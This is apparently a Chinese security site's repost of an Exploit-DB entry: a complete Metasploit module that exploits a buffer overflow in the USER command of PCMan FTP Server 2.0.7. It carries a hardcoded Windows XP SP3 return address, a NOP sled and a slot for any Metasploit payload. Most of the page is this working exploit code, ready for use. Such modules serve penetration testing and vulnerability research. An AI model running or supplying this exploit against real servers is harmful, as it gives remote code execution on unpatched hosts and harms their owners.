首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PCMan FTP Server 2.0.7 - Remote Exploit (msf)
来源:matt.jones.85[at]gmail.com 作者:MSJ 发布时间:2013-07-23  
# Exploit-DB Note: Ret needs adjustment for Windows XP SP3 English
  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
  
require 'msf/core'
  
class Metasploit3 < Msf::Exploit::Remote
    Rank = AverageRanking
  
    include Msf::Exploit::Remote::Ftp
  
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'PCMan\'s FTPD V2.0.7 Username Overflow',
            'Description'    => %q{
                    This module exploits a buffer overflow found in the USER command
                of PCMan's FTPD.
            },
            'Author'         => 'MSJ <matt.jones.85[at]gmail.com>',
            'License'        => MSF_LICENSE,
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'thread'
                },
            'Payload'        =>
                {
                    'Space'    => 2005,
                    'BadChars' => "\x53\x93\x42\x7E",
                    'StackAdjustment' => -3500,
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    # Target 0
                    [
                        'Windows XP SP3 English',
                        {
                            'Ret'      => 0x7e429353 # push esp, ret
                        }
                    ]
                ],
            'Default Target' => 0))
    end
  
    def check
        connect
        disconnect
  
        if (banner =~ /220 PCMan\'s FTP Server 2\.0 Ready\./)
            return Exploit::CheckCode::Vulnerable
        end
            return Exploit::CheckCode::Safe
    end
  
    def exploit
        connect
  
        print_status("Trying target #{target.name}...")
  
        sploit = 'USER ' + "\x41" * 2005 + [target.ret].pack('V') + make_nops(16) + payload.encoded
          
        send_cmd( [sploit] , false )
  
        handler
        disconnect
    end
  
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Nginx 1.3.9 / 1.4.0 Buffer Ove
·VbsEdit 5.9.3 (.smi) - Buffer
·Apple Quicktime 7 Invalid Atom
·Samsung PS50C7700 TV - Denial
·HP Managed Printing Administra
·D-Link Devices UPnP SOAP Comma
·Windows Movie Maker Version 2.
·Foreman (Red Hat OpenStack/Sat
·Symantec Workspace Virtualizat
·VMware vCenter Chargeback Mana
·Jetaudio 8.0.17 Crash Proof Of
·Microsoft Office PowerPoint 20
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved